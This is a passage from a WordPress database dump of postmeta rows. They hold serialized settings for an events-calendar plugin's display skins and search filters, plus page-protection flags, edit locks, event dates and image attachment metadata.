r\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137454,264447,'sf_status','0'),(137455,264447,'sf_display_label','0'),(137456,264447,'show_past_events','1'),(137457,264447,'show_only_past_events','0'),(137458,264447,'show_only_ongoing_events','0'),(137459,264446,'_wp_page_template','default'),(137460,264446,'passster_activate_global_protection',NULL),(137461,264446,'passster_activate_protection',NULL),(137462,264446,'passster_protection_type','password'),(137463,264446,'boldgrid_hide_page_title','0'),(137464,264446,'boldgrid_in_page_containers','1'),(137465,264446,'bgseo_robots_index','index'),(137466,264446,'bgseo_robots_follow','follow'),(137467,264449,'protect_children',''),(137468,264449,'_edit_lock','1620612866:2'),(137469,264449,'_edit_last','2'),(137470,264450,'protect_children',''),(137471,264450,'label',''),(137472,264450,'category','117'),(137473,264450,'location',''),(137474,264450,'organizer',''),(137475,264450,'tag',''),(137476,264450,'author',''),(137477,264450,'skin','monthly_view'),(137478,264450,'sk-options','a:18:{s:4:\"list\";a:30:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:32:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:25:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:15:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264605\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(137479,264450,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137480,264450,'sf_status','0'),(137481,264450,'sf_display_label','0'),(137482,264450,'show_past_events','1'),(137483,264450,'show_only_past_events','0'),(137484,264450,'show_only_ongoing_events','0'),(137485,264449,'_wp_page_template','default'),(137486,264449,'passster_activate_global_protection',NULL),(137487,264449,'passster_activate_protection',NULL),(137488,264449,'passster_protection_type','password'),(137489,264449,'boldgrid_hide_page_title','0'),(137490,264449,'boldgrid_in_page_containers','1'),(137491,264449,'bgseo_robots_index','index'),(137492,264449,'bgseo_robots_follow','follow'),(137493,264438,'_edit_lock','1654657376:2'),(137494,264438,'_edit_last','2'),(137495,264438,'show_only_one_occurrence','0'),(137496,264438,'show_ongoing_events','0'),(137497,264450,'_edit_lock','1621022498:2'),(142750,265063,'mec_location_id','118'),(142749,265063,'mec_color',''),(142748,265063,'_thumbnail_id','265440'),(142747,265063,'_edit_last','2'),(138081,264613,'_field_134','bilia'),(142744,265063,'protect_children',''),(142745,265063,'protect_children',''),(142746,265063,'_edit_lock','1669408772:2'),(192806,269146,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192807,269146,'mec_certain_weekdays','a:0:{}'),(143847,265166,'_thumbnail_id','265167'),(143848,265167,'_wp_attached_file','2021/06/dreaming-2.jpg'),(143849,265167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:641;s:6:\"height\";i:360;s:4:\"file\";s:22:\"2021/06/dreaming-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"dreaming-2-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"dreaming-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:22:\"dreaming-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:22:\"dreaming-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:22:\"dreaming-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:22:\"dreaming-2-300x360.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"dreaming-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143826,265166,'mec_event_date_submit','20210422154949'),(143827,265166,'_edit_lock','1624566314:2'),(143828,265166,'_edit_last','2'),(143829,265166,'mec_read_more',''),(143830,265166,'mec_more_info',''),(143798,265166,'mec_end_time_ampm','PM'),(143799,265166,'mec_end_day_seconds','57600'),(143800,265166,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-19\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-19\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(137566,264550,'protect_children',''),(137567,264550,'_edit_lock','1639802645:2'),(137568,264550,'_edit_last','2'),(137569,264550,'_wp_page_template','default'),(137570,264550,'passster_activate_global_protection',NULL),(137571,264550,'passster_activate_protection',NULL),